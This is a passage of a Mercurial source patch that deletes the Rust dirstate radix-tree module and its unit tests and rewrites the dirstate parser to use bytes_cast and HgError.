-#[derive(Debug, Default, Clone, PartialEq)]
-pub struct Node {
- pub kind: NodeKind,
-}
-
-impl Default for NodeKind {
- fn default() -> Self {
- NodeKind::Directory(Default::default())
- }
-}
-
-impl Node {
- pub fn insert(
- &mut self,
- path: &[u8],
- new_entry: DirstateEntry,
- ) -> InsertResult {
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next().unwrap_or(b"");
- let tail = split.next().unwrap_or(b"");
-
- // Are we modifying the current file? Is this the end of the path?
- let is_current_file = tail.is_empty() && head.is_empty();
-
- // Potentially replace the current file with a directory if it's marked
- // as `Removed`
- if !is_current_file {
- if let NodeKind::File(file) = &mut self.kind {
- if file.entry.state == EntryState::Removed {
- self.kind = NodeKind::Directory(Directory {
- was_file: Some(Box::from(file.clone())),
- children: Default::default(),
- })
- }
- }
- }
- match &mut self.kind {
- NodeKind::Directory(directory) => {
- Node::insert_in_directory(directory, new_entry, head, tail)
- }
- NodeKind::File(file) => {
- if is_current_file {
- let new = Self {
- kind: NodeKind::File(File {
- entry: new_entry,
- ..file.clone()
- }),
- };
- InsertResult {
- did_insert: false,
- old_entry: Some(std::mem::replace(self, new)),
- }
- } else {
- match file.entry.state {
- EntryState::Removed => {
- unreachable!("Removed file turning into a directory was dealt with earlier")
- }
- _ => {
- Node::insert_in_file(
- file, new_entry, head, tail,
- )
- }
- }
- }
- }
- }
- }
-
- /// The current file still exists and is not marked as `Removed`.
- /// Insert the entry in its `was_directory`.
- fn insert_in_file(
- file: &mut File,
- new_entry: DirstateEntry,
- head: &[u8],
- tail: &[u8],
- ) -> InsertResult {
- if let Some(d) = &mut file.was_directory {
- Node::insert_in_directory(d, new_entry, head, tail)
- } else {
- let mut dir = Directory {
- was_file: None,
- children: FastHashMap::default(),
- };
- let res =
- Node::insert_in_directory(&mut dir, new_entry, head, tail);
- file.was_directory = Some(Box::new(dir));
- res
- }
- }
-
- /// Insert an entry in the subtree of `directory`
- fn insert_in_directory(
- directory: &mut Directory,
- new_entry: DirstateEntry,
- head: &[u8],
- tail: &[u8],
- ) -> InsertResult {
- let mut res = InsertResult::default();
-
- if let Some(node) = directory.children.get_mut(head) {
- // Node exists
- match &mut node.kind {
- NodeKind::Directory(subdir) => {
- if tail.is_empty() {
- let becomes_file = Self {
- kind: NodeKind::File(File {
- was_directory: Some(Box::from(subdir.clone())),
- entry: new_entry,
- }),
- };
- let old_entry = directory
- .children
- .insert(head.to_owned(), becomes_file);
- return InsertResult {
- did_insert: true,
- old_entry,
- };
- } else {
- res = node.insert(tail, new_entry);
- }
- }
- NodeKind::File(_) => {
- res = node.insert(tail, new_entry);
- }
- }
- } else if tail.is_empty() {
- // File does not already exist
- directory.children.insert(
- head.to_owned(),
- Self {
- kind: NodeKind::File(File {
- was_directory: None,
- entry: new_entry,
- }),
- },
- );
- res.did_insert = true;
- } else {
- // Directory does not already exist
- let mut nested = Self {
- kind: NodeKind::Directory(Directory {
- was_file: None,
- children: Default::default(),
- }),
- };
- res = nested.insert(tail, new_entry);
- directory.children.insert(head.to_owned(), nested);
- }
- res
- }
-
- /// Removes an entry from the tree, returns a `RemoveResult`.
- pub fn remove(&mut self, path: &[u8]) -> RemoveResult {
- let empty_result = RemoveResult::default();
- if path.is_empty() {
- return empty_result;
- }
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next();
- let tail = split.next().unwrap_or(b"");
-
- let head = match head {
- None => {
- return empty_result;
- }
- Some(h) => h,
- };
- if head == path {
- match &mut self.kind {
- NodeKind::Directory(d) => {
- return Node::remove_from_directory(head, d);
- }
- NodeKind::File(f) => {
- if let Some(d) = &mut f.was_directory {
- let RemoveResult { old_entry, .. } =
- Node::remove_from_directory(head, d);
- return RemoveResult {
- cleanup: false,
- old_entry,
- };
- }
- }
- }
- empty_result
- } else {
- // Look into the dirs
- match &mut self.kind {
- NodeKind::Directory(d) => {
- if let Some(child) = d.children.get_mut(head) {
- let mut res = child.remove(tail);
- if res.cleanup {
- d.children.remove(head);
- }
- res.cleanup =
- d.children.is_empty() && d.was_file.is_none();
- res
- } else {
- empty_result
- }
- }
- NodeKind::File(f) => {
- if let Some(d) = &mut f.was_directory {
- if let Some(child) = d.children.get_mut(head) {
- let RemoveResult { cleanup, old_entry } =
- child.remove(tail);
- if cleanup {
- d.children.remove(head);
- }
- if d.children.is_empty() && d.was_file.is_none() {
- f.was_directory = None;
- }
-
- return RemoveResult {
- cleanup: false,
- old_entry,
- };
- }
- }
- empty_result
- }
- }
- }
- }
-
- fn remove_from_directory(head: &[u8], d: &mut Directory) -> RemoveResult {
- if let Some(node) = d.children.get_mut(head) {
- return match &mut node.kind {
- NodeKind::Directory(d) => {
- if let Some(f) = &mut d.was_file {
- let entry = f.entry;
- d.was_file = None;
- RemoveResult {
- cleanup: false,
- old_entry: Some(entry),
- }
- } else {
- RemoveResult::default()
- }
- }
- NodeKind::File(f) => {
- let entry = f.entry;
- let mut cleanup = false;
- match &f.was_directory {
- None => {
- if d.children.len() == 1 {
- cleanup = true;
- }
- d.children.remove(head);
- }
- Some(dir) => {
- node.kind = NodeKind::Directory(*dir.clone());
- }
- }
-
- RemoveResult {
- cleanup,
- old_entry: Some(entry),
- }
- }
- };
- }
- RemoveResult::default()
- }
-
- pub fn get(&self, path: &[u8]) -> Option<&Node> {
- if path.is_empty() {
- return Some(&self);
- }
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next();
- let tail = split.next().unwrap_or(b"");
-
- let head = match head {
- None => {
- return Some(&self);
- }
- Some(h) => h,
- };
- match &self.kind {
- NodeKind::Directory(d) => {
- if let Some(child) = d.children.get(head) {
- return child.get(tail);
- }
- }
- NodeKind::File(f) => {
- if let Some(d) = &f.was_directory {
- if let Some(child) = d.children.get(head) {
- return child.get(tail);
- }
- }
- }
- }
-
- None
- }
-
- pub fn get_mut(&mut self, path: &[u8]) -> Option<&mut NodeKind> {
- if path.is_empty() {
- return Some(&mut self.kind);
- }
- let mut split = path.splitn(2, |&c| c == b'/');
- let head = split.next();
- let tail = split.next().unwrap_or(b"");
-
- let head = match head {
- None => {
- return Some(&mut self.kind);
- }
- Some(h) => h,
- };
- match &mut self.kind {
- NodeKind::Directory(d) => {
- if let Some(child) = d.children.get_mut(head) {
- return child.get_mut(tail);
- }
- }
- NodeKind::File(f) => {
- if let Some(d) = &mut f.was_directory {
- if let Some(child) = d.children.get_mut(head) {
- return child.get_mut(tail);
- }
- }
- }
- }
-
- None
- }
-
- pub fn iter(&self) -> Iter {
- Iter::new(self)
- }
-}
-
-/// Information returned to the caller of an `insert` operation for integrity.
-#[derive(Debug, Default)]
-pub struct InsertResult {
- /// Whether the insertion resulted in an actual insertion and not an
- /// update
- pub(super) did_insert: bool,
- /// The entry that was replaced, if it exists
- pub(super) old_entry: Option<Node>,
-}
-
- /// Information returned to the caller of a `remove` operation for integrity.
-#[derive(Debug, Default)]
-pub struct RemoveResult {
- /// If the caller needs to remove the current node
- pub(super) cleanup: bool,
- /// The entry that was replaced, if it exists
- pub(super) old_entry: Option<DirstateEntry>,
-}
-
-impl<'a> IntoIterator for &'a Node {
- type Item = (HgPathBuf, DirstateEntry);
- type IntoIter = Iter<'a>;
-
- fn into_iter(self) -> Self::IntoIter {
- self.iter()
- }
-}
--- a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,682 +0,0 @@
-// tree.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-use super::iter::Iter;
-use super::node::{Directory, Node, NodeKind};
-use crate::dirstate::dirstate_tree::iter::FsIter;
-use crate::dirstate::dirstate_tree::node::{InsertResult, RemoveResult};
-use crate::utils::hg_path::{HgPath, HgPathBuf};
-use crate::DirstateEntry;
-use std::path::PathBuf;
-
-/// A specialized tree to represent the Mercurial dirstate.
-///
-/// # Advantages over a flat structure
-///
-/// The dirstate is inherently hierarchical, since it's a representation of the
-/// file structure of the project. The current dirstate format is flat, and
-/// while that affords us potentially great (unordered) iteration speeds, the
-/// need to retrieve a given path is great enough that you need some kind of
-/// hashmap or tree in a lot of cases anyway.
-///
-/// Going with a tree allows us to be smarter:
-/// - Skipping an ignored directory means we don't visit its entire subtree
-/// - Security auditing does not need to reconstruct paths backwards to check
-/// for symlinked directories; this can be done during the iteration in a
-/// very efficient fashion
-/// - We don't need to build the directory information in another struct,
-/// simplifying the code a lot, reducing the memory footprint and
-/// potentially going faster depending on the implementation.
-/// - We can use it to store a (platform-dependent) caching mechanism [1]
-/// - And probably other types of optimizations.
-///
-/// Only the first two items in this list are implemented as of this commit.
-///
-/// [1]: https://www.mercurial-scm.org/wiki/DirsCachePlan
-///
-///
-/// # Structure
-///
-/// It's a prefix (radix) tree with no fixed arity, with a granularity of a
-/// folder, allowing it to mimic a filesystem hierarchy:
-///
-/// ```text
-/// foo/bar
-/// foo/baz
-/// test
-/// ```
-/// Will be represented (simplified) by:
-///
-/// ```text
-/// Directory(root):
-/// - File("test")
-/// - Directory("foo"):
-/// - File("bar")
-/// - File("baz")
-/// ```
-///
-/// Moreover, it is special-cased for storing the dirstate and as such handles
-/// cases that a simple `HashMap` would handle, while preserving the
-/// hierarchy.
-/// For example:
-///
-/// ```shell
-/// $ touch foo
-/// $ hg add foo
-/// $ hg commit -m "foo"
-/// $ hg remove foo
-/// $ rm foo
-/// $ mkdir foo
-/// $ touch foo/a
-/// $ hg add foo/a
-/// $ hg status
-/// R foo
-/// A foo/a
-/// ```
-/// To represent this in a tree, one needs to keep track of whether any given
-/// file was a directory and whether any given directory was a file at the last
-/// dirstate update. This tree stores that information, but only in the right
-/// circumstances by respecting the high-level rules that prevent nonsensical
-/// structures from existing:
-/// - a file can only be added as a child of another file if the latter is
-/// marked as `Removed`
-/// - a file cannot replace a folder unless all its descendants are removed
-///
-/// This second rule is not checked by the tree for performance reasons, and
-/// because high-level logic already prevents that state from happening.
-///
-/// # Ordering
-///
-/// It makes no guarantee of ordering for now.
-#[derive(Debug, Default, Clone, PartialEq)]
-pub struct Tree {
- pub root: Node,
- files_count: usize,
-}
-
-impl Tree {
- pub fn new() -> Self {
- Self {
- root: Node {
- kind: NodeKind::Directory(Directory {
- was_file: None,
- children: Default::default(),
- }),
- },
- files_count: 0,
- }
- }
-
- /// How many files (not directories) are stored in the tree, including ones
- /// marked as `Removed`.
- pub fn len(&self) -> usize {
- self.files_count
- }
-
- pub fn is_empty(&self) -> bool {
- self.len() == 0
- }
-
- /// Inserts a file in the tree and returns the previous entry if any.
- pub fn insert(
- &mut self,
- path: impl AsRef<HgPath>,
- kind: DirstateEntry,
- ) -> Option<DirstateEntry> {
- let old = self.insert_node(path, kind);
- match old?.kind {
- NodeKind::Directory(_) => None,
- NodeKind::File(f) => Some(f.entry),
- }
- }
-
- /// Low-level insertion method that returns the previous node (directories
- /// included).
- fn insert_node(
- &mut self,
- path: impl AsRef<HgPath>,
- kind: DirstateEntry,
- ) -> Option<Node> {
- let InsertResult {
- did_insert,
- old_entry,
- } = self.root.insert(path.as_ref().as_bytes(), kind);
- self.files_count += if did_insert { 1 } else { 0 };
- old_entry
- }
-
- /// Returns a reference to a node if it exists.
- pub fn get_node(&self, path: impl AsRef<HgPath>) -> Option<&Node> {
- self.root.get(path.as_ref().as_bytes())
- }
-
- /// Returns a reference to the entry corresponding to `path` if it exists.
- pub fn get(&self, path: impl AsRef<HgPath>) -> Option<&DirstateEntry> {
- if let Some(node) = self.get_node(&path) {
- return match &node.kind {
- NodeKind::Directory(d) => {
- d.was_file.as_ref().map(|f| &f.entry)
- }
- NodeKind::File(f) => Some(&f.entry),
- };
- }
- None
- }
-
- /// Returns `true` if an entry is found for the given `path`.
- pub fn contains_key(&self, path: impl AsRef<HgPath>) -> bool {
- self.get(path).is_some()
- }
-
- /// Returns a mutable reference to the entry corresponding to `path` if it
- /// exists.
- pub fn get_mut(
- &mut self,
- path: impl AsRef<HgPath>,
- ) -> Option<&mut DirstateEntry> {
- if let Some(kind) = self.root.get_mut(path.as_ref().as_bytes()) {
- return match kind {
- NodeKind::Directory(d) => {
- d.was_file.as_mut().map(|f| &mut f.entry)
- }
- NodeKind::File(f) => Some(&mut f.entry),
- };
- }
- None
- }
-
- /// Returns an iterator over the paths and corresponding entries in the
- /// tree.
- pub fn iter(&self) -> Iter {
- Iter::new(&self.root)
- }
-
- /// Returns an iterator of all entries in the tree, with a special
- /// filesystem handling for the directories containing said entries. See
- /// the documentation of `FsIter` for more.
- pub fn fs_iter(&self, root_dir: PathBuf) -> FsIter {
- FsIter::new(&self.root, root_dir)
- }
-
- /// Removes the entry at `path` and returns it, if it exists.
- pub fn remove(
- &mut self,
- path: impl AsRef<HgPath>,
- ) -> Option<DirstateEntry> {
- let RemoveResult { old_entry, .. } =
- self.root.remove(path.as_ref().as_bytes());
- self.files_count = self
- .files_count
- .checked_sub(if old_entry.is_some() { 1 } else { 0 })
- .expect("removed too many files");
- old_entry
- }
-}
-
-impl<P: AsRef<HgPath>> Extend<(P, DirstateEntry)> for Tree {
- fn extend<T: IntoIterator<Item = (P, DirstateEntry)>>(&mut self, iter: T) {
- for (path, entry) in iter {
- self.insert(path, entry);
- }
- }
-}
-
-impl<'a> IntoIterator for &'a Tree {
- type Item = (HgPathBuf, DirstateEntry);
- type IntoIter = Iter<'a>;
-
- fn into_iter(self) -> Self::IntoIter {
- self.iter()
- }
-}
-
-#[cfg(test)]
-mod tests {
- use super::*;
- use crate::dirstate::dirstate_tree::node::File;
- use crate::{EntryState, FastHashMap};
- use pretty_assertions::assert_eq;
-
- impl Node {
- /// Shortcut for getting children of a node in tests.
- fn children(&self) -> Option<&FastHashMap<Vec<u8>, Node>> {
- match &self.kind {
- NodeKind::Directory(d) => Some(&d.children),
- NodeKind::File(_) => None,
- }
- }
- }
-
- #[test]
- fn test_dirstate_tree() {
- let mut tree = Tree::new();
-
- assert_eq!(
- tree.insert_node(
- HgPath::new(b"we/p"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0
- }
- ),
- None
- );
- dbg!(&tree);
- assert!(tree.get_node(HgPath::new(b"we")).is_some());
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 41,
- mtime: 42,
- size: 43,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"foo/bar"), entry), None);
- assert_eq!(
- tree.get_node(HgPath::new(b"foo/bar")),
- Some(&Node {
- kind: NodeKind::File(File {
- was_directory: None,
- entry
- })
- })
- );
- // We didn't override the first entry we made
- assert!(tree.get_node(HgPath::new(b"we")).is_some(),);
- // Inserting the same key again
- assert_eq!(
- tree.insert_node(HgPath::new(b"foo/bar"), entry),
- Some(Node {
- kind: NodeKind::File(File {
- was_directory: None,
- entry
- }),
- })
- );
- // Inserting two levels deep
- assert_eq!(tree.insert_node(HgPath::new(b"foo/bar/baz"), entry), None);
- // Getting a file "inside a file" should return `None`
- assert_eq!(tree.get_node(HgPath::new(b"foo/bar/baz/bap"),), None);
-
- assert_eq!(
- tree.insert_node(HgPath::new(b"wasdir/subfile"), entry),
- None,
- );
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- };
- assert!(tree
- .insert_node(HgPath::new(b"wasdir"), removed_entry)
- .is_some());
-
- assert_eq!(
- tree.get_node(HgPath::new(b"wasdir")),
- Some(&Node {
- kind: NodeKind::File(File {
- was_directory: Some(Box::new(Directory {
- was_file: None,
- children: [(
- b"subfile".to_vec(),
- Node {
- kind: NodeKind::File(File {
- was_directory: None,
- entry,
- })
- }
- )]
- .to_vec()
- .into_iter()
- .collect()
- })),
- entry: removed_entry
- })
- })
- );
-
- assert!(tree.get(HgPath::new(b"wasdir/subfile")).is_some())
- }
-
- #[test]
- fn test_insert_removed() {
- let mut tree = Tree::new();
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 10,
- mtime: 20,
- size: 30,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"foo"), entry), None);
- assert_eq!(
- tree.insert_node(HgPath::new(b"foo/a"), removed_entry),
- None
- );
- // The insert should not turn `foo` into a directory as `foo` is not
- // `Removed`.
- match tree.get_node(HgPath::new(b"foo")).unwrap().kind {
- NodeKind::Directory(_) => panic!("should be a file"),
- NodeKind::File(_) => {}
- }
-
- let mut tree = Tree::new();
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 10,
- mtime: 20,
- size: 30,
- };
- // The insert *should* turn `foo` into a directory as it is `Removed`.
- assert_eq!(tree.insert_node(HgPath::new(b"foo"), removed_entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"foo/a"), entry), None);
- match tree.get_node(HgPath::new(b"foo")).unwrap().kind {
- NodeKind::Directory(_) => {}
- NodeKind::File(_) => panic!("should be a directory"),
- }
- }
-
- #[test]
- fn test_get() {
- let mut tree = Tree::new();
- let entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry));
- assert_eq!(tree.get(HgPath::new(b"a/b")), None);
- assert_eq!(tree.get(HgPath::new(b"a")), None);
- assert_eq!(tree.get(HgPath::new(b"a/b/c/d")), None);
- let entry2 = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 5,
- size: 1,
- };
- // was_directory
- assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2));
- assert_eq!(tree.get(HgPath::new(b"a/b/c")), Some(&entry));
-
- let mut tree = Tree::new();
-
- // was_file
- assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get(HgPath::new(b"a/b")), Some(&entry2));
- }
-
- #[test]
- fn test_get_mut() {
- let mut tree = Tree::new();
- let mut entry = DirstateEntry {
- state: EntryState::Merged,
- mode: 1,
- mtime: 2,
- size: 3,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry));
- assert_eq!(tree.get_mut(HgPath::new(b"a/b")), None);
- assert_eq!(tree.get_mut(HgPath::new(b"a")), None);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b/c/d")), None);
- let mut entry2 = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 5,
- size: 1,
- };
- // was_directory
- assert_eq!(tree.insert(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2));
- assert_eq!(tree.get_mut(HgPath::new(b"a/b/c")), Some(&mut entry));
-
- let mut tree = Tree::new();
-
- // was_file
- assert_eq!(tree.insert_node(HgPath::new(b"a"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b"), entry2), None);
- assert_eq!(tree.files_count, 2);
- assert_eq!(tree.get_mut(HgPath::new(b"a/b")), Some(&mut entry2));
- }
-
- #[test]
- fn test_remove() {
- let mut tree = Tree::new();
- assert_eq!(tree.files_count, 0);
- assert_eq!(tree.remove(HgPath::new(b"foo")), None);
- assert_eq!(tree.files_count, 0);
-
- let entry = DirstateEntry {
- state: EntryState::Normal,
- mode: 0,
- mtime: 0,
- size: 0,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
-
- assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry));
- assert_eq!(tree.files_count, 0);
-
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/y"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/z"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"x"), entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"y"), entry), None);
- assert_eq!(tree.files_count, 5);
-
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry));
- assert_eq!(tree.files_count, 4);
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), None);
- assert_eq!(tree.files_count, 4);
- assert_eq!(tree.remove(HgPath::new(b"a/b/y")), Some(entry));
- assert_eq!(tree.files_count, 3);
- assert_eq!(tree.remove(HgPath::new(b"a/b/z")), Some(entry));
- assert_eq!(tree.files_count, 2);
-
- assert_eq!(tree.remove(HgPath::new(b"x")), Some(entry));
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.remove(HgPath::new(b"y")), Some(entry));
- assert_eq!(tree.files_count, 0);
-
- // `a` should have been cleaned up, no more files anywhere in its
- // descendants
- assert_eq!(tree.get_node(HgPath::new(b"a")), None);
- assert_eq!(tree.root.children().unwrap().len(), 0);
-
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- ..entry
- };
- assert_eq!(tree.insert(HgPath::new(b"a"), removed_entry), None);
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/x"), entry), None);
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a")), Some(removed_entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(entry));
- assert_eq!(tree.files_count, 0);
-
- // The entire tree should have been cleaned up, no more files anywhere
- // in its descendants
- assert_eq!(tree.root.children().unwrap().len(), 0);
-
- let removed_entry = DirstateEntry {
- state: EntryState::Removed,
- ..entry
- };
- assert_eq!(tree.insert(HgPath::new(b"a"), entry), None);
- assert_eq!(
- tree.insert_node(HgPath::new(b"a/b/x"), removed_entry),
- None
- );
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a")), Some(entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/b/x")), Some(removed_entry));
- assert_eq!(tree.files_count, 0);
-
- dbg!(&tree);
- // The entire tree should have been cleaned up, no more files anywhere
- // in its descendants
- assert_eq!(tree.root.children().unwrap().len(), 0);
-
- assert_eq!(tree.insert(HgPath::new(b"d"), entry), None);
- assert_eq!(tree.insert(HgPath::new(b"d/d/d"), entry), None);
- assert_eq!(tree.files_count, 2);
-
- // Deleting the nested file should not delete the top directory as it
- // used to be a file
- assert_eq!(tree.remove(HgPath::new(b"d/d/d")), Some(entry));
- assert_eq!(tree.files_count, 1);
- assert!(tree.get_node(HgPath::new(b"d")).is_some());
- assert!(tree.remove(HgPath::new(b"d")).is_some());
- assert_eq!(tree.files_count, 0);
-
- // Deleting the nested file should not delete the top file (other way
- // around from the last case)
- assert_eq!(tree.insert(HgPath::new(b"a/a"), entry), None);
- assert_eq!(tree.files_count, 1);
- assert_eq!(tree.insert(HgPath::new(b"a"), entry), None);
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/a")), Some(entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- assert!(tree.get_node(HgPath::new(b"a")).is_some());
- assert!(tree.get_node(HgPath::new(b"a/a")).is_none());
- }
-
- #[test]
- fn test_was_directory() {
- let mut tree = Tree::new();
-
- let entry = DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- };
- assert_eq!(tree.insert_node(HgPath::new(b"a/b/c"), entry), None);
- assert_eq!(tree.files_count, 1);
-
- assert!(tree.insert_node(HgPath::new(b"a"), entry).is_some());
- let new_a = tree.root.children().unwrap().get(&b"a".to_vec()).unwrap();
-
- match &new_a.kind {
- NodeKind::Directory(_) => panic!(),
- NodeKind::File(f) => {
- let dir = f.was_directory.clone().unwrap();
- let c = dir
- .children
- .get(&b"b".to_vec())
- .unwrap()
- .children()
- .unwrap()
- .get(&b"c".to_vec())
- .unwrap();
-
- assert_eq!(
- match &c.kind {
- NodeKind::Directory(_) => panic!(),
- NodeKind::File(f) => f.entry,
- },
- entry
- );
- }
- }
- assert_eq!(tree.files_count, 2);
- dbg!(&tree);
- assert_eq!(tree.remove(HgPath::new(b"a/b/c")), Some(entry));
- assert_eq!(tree.files_count, 1);
- dbg!(&tree);
- let a = tree.get_node(HgPath::new(b"a")).unwrap();
- match &a.kind {
- NodeKind::Directory(_) => panic!(),
- NodeKind::File(f) => {
- // Directory in `was_directory` was emptied, should be removed
- assert_eq!(f.was_directory, None);
- }
- }
- }
- #[test]
- fn test_extend() {
- let insertions = [
- (
- HgPathBuf::from_bytes(b"d"),
- DirstateEntry {
- state: EntryState::Added,
- mode: 0,
- mtime: -1,
- size: -1,
- },
- ),
- (
- HgPathBuf::from_bytes(b"b"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 33188,
- mtime: 1599647984,
- size: 2,
- },
- ),
- (
- HgPathBuf::from_bytes(b"a/a"),
- DirstateEntry {
- state: EntryState::Normal,
- mode: 33188,
- mtime: 1599647984,
- size: 2,
- },
- ),
- (
- HgPathBuf::from_bytes(b"d/d/d"),
- DirstateEntry {
- state: EntryState::Removed,
- mode: 0,
- mtime: 0,
- size: 0,
- },
- ),
- ]
- .to_vec();
- let mut tree = Tree::new();
-
- tree.extend(insertions.clone().into_iter());
-
- for (path, _) in &insertions {
- assert!(tree.contains_key(path));
- }
- assert_eq!(tree.files_count, 4);
- }
-}
--- a/rust/hg-core/src/dirstate/parsers.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/parsers.rs Tue Apr 20 11:01:06 2021 -0400
@@ -3,15 +3,16 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
+use crate::errors::HgError;
use crate::utils::hg_path::HgPath;
use crate::{
- dirstate::{CopyMap, EntryState, StateMap},
- DirstateEntry, DirstatePackError, DirstateParents, DirstateParseError,
+ dirstate::{CopyMap, EntryState, RawEntry, StateMap},
+ DirstateEntry, DirstateParents,
};
-use byteorder::{BigEndian, ReadBytesExt, WriteBytesExt};
+use byteorder::{BigEndian, WriteBytesExt};
+use bytes_cast::BytesCast;
use micro_timer::timed;
use std::convert::{TryFrom, TryInto};
-use std::io::Cursor;
use std::time::Duration;
/// Parents are stored in the dirstate as byte hashes.
@@ -20,77 +21,64 @@
const MIN_ENTRY_SIZE: usize = 17;
type ParseResult<'a> = (
- DirstateParents,
+ &'a DirstateParents,
Vec<(&'a HgPath, DirstateEntry)>,
Vec<(&'a HgPath, &'a HgPath)>,
);
-#[timed]
-pub fn parse_dirstate(
+pub fn parse_dirstate_parents(
contents: &[u8],
-) -> Result<ParseResult, DirstateParseError> {
- if contents.len() < PARENT_SIZE * 2 {
- return Err(DirstateParseError::TooLittleData);
- }
- let mut copies = vec![];
- let mut entries = vec![];
+) -> Result<&DirstateParents, HgError> {
+ let (parents, _rest) = DirstateParents::from_bytes(contents)
+ .map_err(|_| HgError::corrupted("Too little data for dirstate."))?;
+ Ok(parents)
+}
- let mut curr_pos = PARENT_SIZE * 2;
- let parents = DirstateParents {
- p1: contents[..PARENT_SIZE].try_into().unwrap(),
- p2: contents[PARENT_SIZE..curr_pos].try_into().unwrap(),
- };
+#[timed]
+pub fn parse_dirstate(mut contents: &[u8]) -> Result<ParseResult, HgError> {
+ let mut copies = Vec::new();
+ let mut entries = Vec::new();
- while curr_pos < contents.len() {
- if curr_pos + MIN_ENTRY_SIZE > contents.len() {
- return Err(DirstateParseError::Overflow);
- }
- let entry_bytes = &contents[curr_pos..];
+ let (parents, rest) = DirstateParents::from_bytes(contents)
+ .map_err(|_| HgError::corrupted("Too little data for dirstate."))?;
+ contents = rest;
+ while !contents.is_empty() {
+ let (raw_entry, rest) = RawEntry::from_bytes(contents)
+ .map_err(|_| HgError::corrupted("Overflow in dirstate."))?;
- let mut cursor = Cursor::new(entry_bytes);
- let state = EntryState::try_from(cursor.read_u8()?)?;
- let mode = cursor.read_i32::<BigEndian>()?;
- let size = cursor.read_i32::<BigEndian>()?;
- let mtime = cursor.read_i32::<BigEndian>()?;
- let path_len = cursor.read_i32::<BigEndian>()? as usize;
+ let entry = DirstateEntry {
+ state: EntryState::try_from(raw_entry.state)?,
+ mode: raw_entry.mode.get(),
+ mtime: raw_entry.mtime.get(),
+ size: raw_entry.size.get(),
+ };
+ let (paths, rest) =
+ u8::slice_from_bytes(rest, raw_entry.length.get() as usize)
+ .map_err(|_| HgError::corrupted("Overflow in dirstate."))?;
- if path_len > contents.len() - curr_pos {
- return Err(DirstateParseError::Overflow);
+ // `paths` is either a single path, or two paths separated by a NULL
+ // byte
+ let mut iter = paths.splitn(2, |&byte| byte == b'\0');
+ let path = HgPath::new(
+ iter.next().expect("splitn always yields at least one item"),
+ );
+ if let Some(copy_source) = iter.next() {
+ copies.push((path, HgPath::new(copy_source)));
}
- // Slice instead of allocating a Vec needed for `read_exact`
- let path = &entry_bytes[MIN_ENTRY_SIZE..MIN_ENTRY_SIZE + (path_len)];
-
- let (path, copy) = match memchr::memchr(0, path) {
- None => (path, None),
